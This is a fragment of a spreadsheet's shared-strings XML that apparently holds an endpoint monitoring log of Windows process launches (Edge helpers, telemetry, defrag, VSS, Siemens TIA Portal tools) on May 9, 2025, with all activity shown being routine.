  <si>
    <t>May 9, 2025 @ 14:00:25.764</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:25.796</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:25.850</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:28.470</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:28.471</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:28.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:29.630</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:29.697</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:32.447</t>
  </si>
  <si>
    <t>/QuitInfo:0000000000000AE0;0000000000000AE4;</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:34.494</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:35.151</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:41.567</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:43.249</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:44.761</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:44.772</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:44.839</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:44.892</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:47.252</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:48.372</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:48.553</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=crashpad-handler \"--user-data-dir=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler \"--database=C:\\Users\\carol\\AppData\\Local\\Microsoft\\Edge\\User Data\\Crashpad\" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=136.0.7103.49 \"--annotation=exe=C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=136.0.3240.50 --initial-client-data=0x26c,0x270,0x274,0x268,0x27c,0x7fff536f7088,0x7fff536f7094,0x7fff536f70a0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:49.454</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:49.546</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=2528 /prefetch:11</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:49.572</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:2</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:49.588</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=2876 /prefetch:13</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:50.914</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:50.915</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=PooledProcess2 --lang=en-GB --service-sandbox-type=utility --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=4664 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:50.945</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\136.0.3240.50\\identity_helper.exe\" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-GB --service-sandbox-type=none --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=4844 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:52.108</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:52.113</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:54.286</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:54.344</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:54.347</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.651</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.681</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.754</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.758</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.775</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.787</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.798</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.807</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.808</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.828</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.851</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.852</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.856</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:56.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:57.909</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:57.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:57.979</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:00:58.007</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:00.753</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:00.982</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:04.748</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:17.809</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:19.350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</si>
  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=4976 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:19.405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</si>
  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5108 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:19.460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</si>
  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5132 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:23.301</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:25.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:28.891</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:47.758</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:47.830</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:50.517</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5152 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:52.252</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5188 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:01:55.091</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-GB --service-sandbox-type=service --no-pre-read-main-dll --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=4720 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:04.741</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:04.754</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:04.760</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:06.925</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:06.939</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:13.877</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:14.712</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:41.496</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:41.515</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:41.534</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:43.203</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:43.210</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:43.987</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\uus\\packages\\preview\\AMD64\\MoNotificationUx.exe /ClearActiveNotifications /CV cXq97g2f50SlSL/w.1.0.0</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:49.150</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:49.152</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:49.153</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=5140 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.26100.3624 --no-pre-read-main-dll --gpu-preferences=UAAAAAAAAADoAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAABCAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5168 /prefetch:10</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:53.771</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:53.782</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:53.799</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:53.806</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:54.860</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:02:54.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:00.600</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:05.000</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:05.011</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:18.908</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:74snxlH6zkaydi+t.0.1 -wce:0000000000000214  -m:invagent.dll -f:RunUpdate</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:21.124</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:74snxlH6zkaydi+t.0.2 -wce:0000000000000214  -m:aemarebackup.dll -f:BackupMareData</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:48.712</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:74snxlH6zkaydi+t.0.3 -wce:0000000000000218  -m:appraiser.dll -f:UpdateAvStatus</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:48.726</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:74snxlH6zkaydi+t.0.4 -wce:0000000000000218  -m:GeneralTel.dll -f:RunGeneralTelemetry</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:49.921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</si>
  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:53.911</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:57.362</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:57.373</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:03:57.383</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:00.399</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:00.417</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:00.448</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:00.479</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:00.483</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:00.572</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:02.285</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:02.857</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\TIAADMIN\\server\\modules\\soft\\native\\Setup.Inventory.UI.exe\" /o \"C:\\ProgramData\\Siemens\\Automation\\AWB\\SWM\\Setup.Inventory.UI.xml\"</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:02.868</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:03.655</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:04.672</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\Microsoft.NET\\Framework\\v2.0.50727\\ngen.exe\" queue pause</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:04.702</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:06.731</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:06.758</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:06.759</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:09.042</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:09.054</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:09.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:11.448</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:11.532</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:11.535</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:12.826</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.472</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.495</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.511</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.525</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.536</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.547</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.570</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.586</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.635</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.673</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:14.674</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:15.463</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:15.476</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:15.478</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.249</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.255</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.258</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.274</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.277</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.300</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.303</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.319</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.338</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.352</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.367</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:19.382</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:20.429</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:21.540</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.1 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:22.694</t>
  </si>
  <si>
    <t>\"C:\\Program Files\\Siemens\\Automation\\Portal V17\\Bin\\Siemens.Automation.Portal.exe\" -nosplashscreen -logging=false -bootstrapper=Siemens.Automation.Workbench:Siemens.Automation.Workbench.Bootstrapper -resultDirectoryPath=C:\\ProgramData\\Siemens\\Automation\\AWB\\SWM</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:29.966</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:29.982</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:29.992</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:49.686</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:49.788</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:49.836</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:49.837</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:49.841</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:49.842</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.010</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.055</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.057</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.058</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.062</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.063</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.064</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.065</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.066</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.069</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.070</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.075</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:04:50.076</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:05:13.214</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:05:13.215</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:05:20.155</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:05:50.040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</si>
  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=3204 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:18.657</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:18.667</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:20.295</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.880</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.889</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.943</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.944</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.945</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.947</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:29.980</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:32.043</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:32.056</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:33.615</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:33.634</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:35.829</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:35.835</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:35.841</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:35.847</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:36.927</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:40.011</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\defrag.exe\" -p 4a8 -s 0000000000000AEC -b -OnlyPreferred C:</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:40.012</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:40.022</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:06:40.068</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:12.252</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:16.354</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.760</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.844</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.852</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.858</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.873</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.897</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.901</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.905</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.949</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:49.967</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:07:55.621</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:15.227</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\defrag.exe\" -p 53c -s 00000000000009CC -b -OnlyPreferred C:</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:15.228</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:15.229</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:15.230</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:18.594</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:18.605</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:18.609</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:20.728</t>
  </si>
  <si>
    <t>C:\\Windows\\System32\\Dism\\dismhost.exe {0636A46C-6F03-4857-A392-16FFBBB6790E}</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:30.618</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:52.390</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:52.421</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:54.460</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:58.815</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:58.819</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:08:58.866</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:00.686</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:00.748</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:00.750</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:53.724</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:54.900</t>
  </si>
  <si>
    <t>\"C:\\WINDOWS\\system32\\srtasks.exe\" ExecuteScheduledSPPCreation</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:54.906</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:54.932</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:54.982</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\vssvc.exe</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:56.024</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:56.042</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\System32\\svchost.exe -k swprv</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:09:57.325</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:15.231</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:15.239</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:16.510</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:16.521</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:22.620</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:22.698</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:28.449</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:28.494</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:28.495</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:46.179</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:46.186</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:46.190</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:46.191</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:10:52.958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</si>
  <si>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--field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=4480 /prefetch:14</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:11:51.479</t>
  </si>
  <si>
    <t>C:\\WINDOWS\\system32\\compattelrunner.exe -cv:JQM+ctgc3UehG9Jz.0.2 -wce:0000000000000210  -m:aeinv.dll -f:UpdateSoftwareInventoryW invsvc</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:12:46.469</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:12:51.416</t>
  </si>
  <si>
    <t>Agent event queue is 90% full.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:12:53.514</t>
  </si>
  <si>
    <t>Agent event queue is full. Events may be lost.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:12:55.365</t>
  </si>
  <si>
    <t>The VSS service is shutting down due to idle timeout.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:13:07.691</t>
  </si>
  <si>
    <t>Agent event queue is flooded. Check the agent configuration.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:15:22.495</t>
  </si>
  <si>
    <t>Agent event queue is back to normal load.</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:08.945</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.222</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.261</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.331</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.405</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.459</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.514</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.533</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.578</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.654</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.690</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.691</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=19 --time-ticks-at-unix-epoch=-1746795313056761 --launch-time-ticks=1210086811 --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5024 /prefetch:1</t>
  </si>
  <si>
    <t>May 9, 2025 @ 14:16:09.740</t>
  </si>
  <si>
    <t>\"C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe\" --type=renderer --instant-process --pdf-upsell-enabled --no-pre-read-main-dll --video-capture-use-gpu-memory-buffer --lang=en-GB --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=2 --enable-main-frame-before-activation --renderer-client-id=18 --time-ticks-at-unix-epoch=-1746795313056761 --launch-time-ticks=1210140149 --always-read-main-dll --field-trial-handle=2376,i,2209268455715813206,15638248104676148221,262144 --variations-seed-version --mojo-platform-channel-handle=5268 /prefetch:1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</si>
